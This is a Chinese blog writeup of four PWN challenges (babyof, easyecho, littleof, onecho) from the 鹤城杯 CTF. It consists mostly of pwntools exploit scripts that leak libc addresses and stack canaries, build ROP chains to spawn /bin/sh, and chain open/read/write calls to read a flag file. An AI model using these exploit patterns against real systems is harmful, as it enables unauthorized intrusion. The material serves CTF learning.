鹤城杯PWN几道题的writeup

最新推荐文章于 2023-11-29 20:31:36 发布
最新推荐文章于 2023-11-29 20:31:36 发布
阅读量552 收藏 1
点赞数 1
分类专栏: ctf 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wdearzh/article/details/120680541
版权

目录

babyof

easyecho

littleof

onecho

babyof

#encoding=utf-8
from pwn import *
context(os='linux',arch='amd64')
fpath='/home/kali/ctf/pwn/ti/hb/babyof/babyof'
r = process(fpath)
#r = remote("182.116.62.85",21613)
elf = ELF(fpath) 
libc =elf.libc

poprdi_addr = 0x400743
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = 0x400550
payload = b'a'*0x40 +p64(0)+p64(poprdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
r.sendlineafter("Do you know how to do buffer overflow?", payload)
r.recvuntil("I hope you win\n")
puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print("puts_addr:"+hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
print("libc_base:"+hex(libc_base))

sysoffset   = libc.symbols['system'] 
sys_addr=sysoffset + libc_base
print("sys_addr:"+hex(sys_addr))
sh_offset=next(libc.search(b"/bin/sh\0"))
sh_addr=sh_offset + libc_base
print("sh_addr:"+hex(sh_addr))

ret_addr = poprdi_addr +1
payload=b"A"*0x40+p64(0)+p64(poprdi_addr)+p64(sh_addr)+p64(ret_addr)+p64(sys_addr) 
r.sendlineafter("Do you know how to do buffer overflow?", payload)
r.interactive()

easyecho

#encoding=utf-8
from pwn import *
context.log_level = 'debug'
fpath='/home/kali/ctf/pwn/ti/hb/easyecho'
#r = process(fpath)
r = remote("182.116.62.85",24842)
elf = ELF(fpath) 
libc =elf.libc

r.sendlineafter("Please give me your name~", 'w'*16)
r.recvuntil('w'*16)
func_addr = u64(r.recv(6).ljust(8,b'\0'))
print("func_addr:"+hex(func_addr))

r.sendlineafter("Input:", 'backdoor')
buf_addr = func_addr+0x201350
payload = b'exitexit\0'
payload = payload.ljust(0x98,b'a') + p64(buf_addr)*100

r.sendlineafter("Input:", payload)

r.interactive()

littleof

#encoding=utf-8
from pwn import *
context(os='linux',arch='amd64')
fpath='/home/kali/ctf/pwn/ti/hb/littleof/littleof'
#r = process(fpath)
r = remote("182.116.62.85",27056)
elf = ELF(fpath) 
libc =elf.libc

payload = b'a'*(0x50 - 8)
r.sendlineafter("Do you know how to do buffer overflow?", payload)
#泄露canary
r.recvuntil(payload) 
canary=u64(r.recv(8))-0x0a 
print("canary:"+hex(canary))
init_addr=u64(r.recv(6).ljust(8, b'\0')) 
print("init_addr:"+hex(init_addr))


poprdi_addr = 0x400863
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = 0x400600
payload = b'a'*(0x50 - 8) +p64(canary) +p64(0) + p64(poprdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
r.sendlineafter("Try harder!", payload)
r.recvuntil("I hope you win\n")
puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print("puts_addr:"+hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
print("libc_base:"+hex(libc_base))

sysoffset   = libc.symbols['system'] 
sys_addr=sysoffset + libc_base
print("sys_addr:"+hex(sys_addr))
sh_offset=next(libc.search(b"/bin/sh\0"))
sh_addr=sh_offset + libc_base
print("sh_addr:"+hex(sh_addr))

r.sendlineafter("Do you know how to do buffer overflow?", "aa")

ret_addr = poprdi_addr +1
payload=b'a'*(0x50 - 8) +p64(canary) +p64(0)+p64(poprdi_addr)+p64(sh_addr)+p64(ret_addr)+p64(sys_addr) #system方式
r.sendline(payload)
r.interactive()

onecho

#encoding=utf-8

#puts 泄露 libc地址后 orw

from pwn import *
context.log_level = 'debug'
fpath='/home/kali/ctf/pwn/ti/hb/onecho/onecho'
r = process(fpath)
#r = remote("182.116.62.85",21613)
elf = ELF(fpath) 
libc =elf.libc
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']


main_addr = 0x804966E
start_addr = 0x80495C6
bss = elf.bss()
print("bss:"+hex(bss))
pop_ret = 0x08049842
payload = b'flag\0' 
payload = payload.ljust(0x10C,b'\0')
payload +=p32(0)+p32(pop_ret)+p32(bss)+p32(puts_plt)+p32(start_addr)+p32(puts_got)

r.sendlineafter("Input your name:", payload)
r.recvuntil('\n')
puts_addr = u32(r.recv(4))
print("puts_addr:"+hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
print("libc_base:"+hex(libc_base))

open_addr = libc_base + libc.symbols['open']
print("open_addr:"+hex(open_addr))
read_addr = libc_base + libc.symbols['read']
print("read_addr:"+hex(read_addr))
write_addr = libc_base + libc.symbols['write']
print("write_addr:"+hex(write_addr))


pop_ret = 0x08049842
pop3_ret = 0x000b82b7+libc_base
payload = b'./flag\0' 
payload = payload.ljust(0x10C,b'\0')
payload +=p32(0)+p32(pop3_ret)+p32(bss)+p32(1000)+p32(1000)
payload +=p32(open_addr)+p32(pop3_ret)+p32(bss)+p32(0)+p32(0)
payload +=p32(read_addr)+p32(pop3_ret)+p32(3)+p32(bss)+p32(30)
payload +=p32(write_addr)+p32(pop3_ret)+p32(1)+p32(bss)+p32(30)

r.sendline(payload)
r.interactive()

丶拾光_w4ngz
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
NSSCTF刷笔记pwn10——[2021 杯]babyof
qq_45692883的博客
02-02 290
朴实无华的栈溢出,没有system函数,也没有/bin/sh字符串,也没有给libc文件。这是通过libcsearcher获取偏移的代码,可惜在这好像行不通,但是思路是这样子的。通过泄露目标的函数地址,我可以确定目标使用的是这两个libc文件。然后是修改过后的代码,基本上没差。但是我们有puts可以泄露数据。
littleof ——攻防世界
qq_41696518的博客
08-30 1706
littleof ——攻防世界
2021writeup
NNanfeng
10-08 1630
MISC 1.NEW MISC 下载文件,是一个pdf文件 打开pdf,有俄文看不懂,因为是一道杂项考虑隐写,百度“ctf pdf 隐写” http://blog.sina.com.cn/s/blog_6dc0c58b0102x9zd.html 找到了这位师傅写的总结,pdf两种隐写方式,如下图: 找工具:wbStego4.3open 找不到工具的师傅可以去我分享的链接下载:链接:https://pan.baidu.com/s/1S-w-W8YcAZVU4hKJXez7cg 提取码:da4l –来自百
[2021 杯]babyof(libc泄露)
m0_74355719的博客
11-29 446
【代码】[2021 杯]babyof(libc泄露)
PWN · ret2libc | Canary】[2021 杯]littleof
Mr_Fmnwon的博客
06-08 827
Canary作为经典且基本的栈保护措施,在后期的目中必然是基本标配。作为新手小白,最初这几次接触有点难受,but多做总结嘛。——ret2libc也依旧不熟练,做总结也是意料之中的事情。不断总结,不断求学。
pwn栈溢出10道练习writeup
01-04
pwn栈溢出练习目,每都有writeup.
pwn练习附件四道含exp
11-21
个人pwn练习目https://blog.csdn.net/yusakul/article/details/103147299,含exp,推荐去原链接下载:https://bbs.ichunqiu.com/thread-42241-1-1.html
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1目的解决方法。该目是一个Pwn目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解目的基本信息。目中提供了一个可执行文件pwn1,运行起来后显示...
强网杯2022 pwn解析.docx
12-18
【强网杯2022 Pwn解析】 在网络安全竞赛“强网杯”中,Pwn类赛往往考验参赛者对内存安全漏洞利用的理解和技术应用。本涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
2017湖湘杯pwn100的
11-30
2017湖湘杯pwn100的目的二进制文件和libc的二进制文件
PWN入门(2)栈溢出基础
农夫果园好好喝的博客
06-29 774
PWN栈溢出基础。
PWN · Stack Smash】[2021 杯]easyecho
Mr_Fmnwon的博客
07-30 643
Canary保护,是在栈上插入一段随机数;进入函数后,也就是call完后会有push ebp,mov ebp,esp,最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次,canary与原先值是否相同来判断是否被栈溢出覆盖返回地址了。然而,Smash这种方法,恰好是利用Canary保护机制,修改相关函数参数,泄露信息。详细介绍Smash的文章不在少数,本文主要聚焦于做出目,因此重点(但非详细)阐述我所理解的重点部分。
信息安全实验一:buffer-overflow
weixin_33714884的博客
03-07 596
title: buffer-overflow date: 2016-01-10 14:17:17 categories: information-security tags: buffer-overflow --- Excrcise1 Now, you can write some code. Your job is to print the address of the variable bu...
2021-杯部分Wp by Rewrite
Re_ly0n的博客
10-09 1226
Web狗的我今天上午满课,下午两节课,抽时间做了两个web,u1s1,两个web都是原pwn????刚开始pwn本地全部打通了,然后远程死活不通,最后跑路永劫无间了。哈哈哈哈 WEB MIDDLE_MAGIC %0a绕过第一关最后加%23是# 数组绕过第二关 json 弱类型比较 payload GET aaa=%0apass_the_level_1%23 POST admin[]=1&root_pwd[]=2&level_3={"result":0} SPRING
2021梦极光CTF Pwn
qq_61793472的博客
11-23 424
pwn
西湖论剑 pwn解析(持续更新中)
qq_41071646的博客
04-12 978
这篇文章是我在我志琦哥 我们工作室 负责人 旁边 我俩上数据库课 我看着他一步一步 搞出来的 太强了 不过现在应该还在和我一样自闭中。。。 这个 有 canary 保护 然后这个 思路就是 找到 canary的偏移 然后泄露libc 库 然后 获取 system 地址 x64 要找 pop 这里 获取到 puts函数的地址 但是这个 并没...
pico ctf 2013 php3,picoCTFのpwn解析
weixin_39895977的博客
03-23 547
前言国庆期间得知了美国CMU主办的picoCTF比赛,出于最近做的手感有所下降,借此比赛来复习下PWN相关的型(目的质量不错,而且型很广,自我感觉相当棒的比赛)buffer overflow 0先检查一遍文件➜ bufferoverflow0 file vulnvuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), ...
「EasyEcho」轻松实现页面数据回显和保存,让你从无尽的setText和getText中解脱出来
Z_4545287的博客
04-25 516
一行代码解决 Android 页面数据回显和数据保存,Map 型和 Java Bean 型数据都支持。极大提高工作效率,在数据项多的情况下尤为明显。
XCTF PWN高手进阶区之babystack
neuisf的博客
01-30 468
,开启了RELRO、NX、CANARY,未开启PIE,只有read函数溢出存在溢出可能。 第一,泄露canary,程序会通过puts函数输出缓冲区s的内容。puts函数在输出时,只有遇到\0才会结束,而缓冲区s又和main函数的canary相连,此时,输入和缓冲区大小相等的字符串,溢出的\n将会覆盖canary的第一字节00,从而将canary的后三个字节输出,构建canary。 第二,获取s...
2023 羊pwn
最新发布
01-02
2023年的羊pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊杯吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丶拾光_w4ngz

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值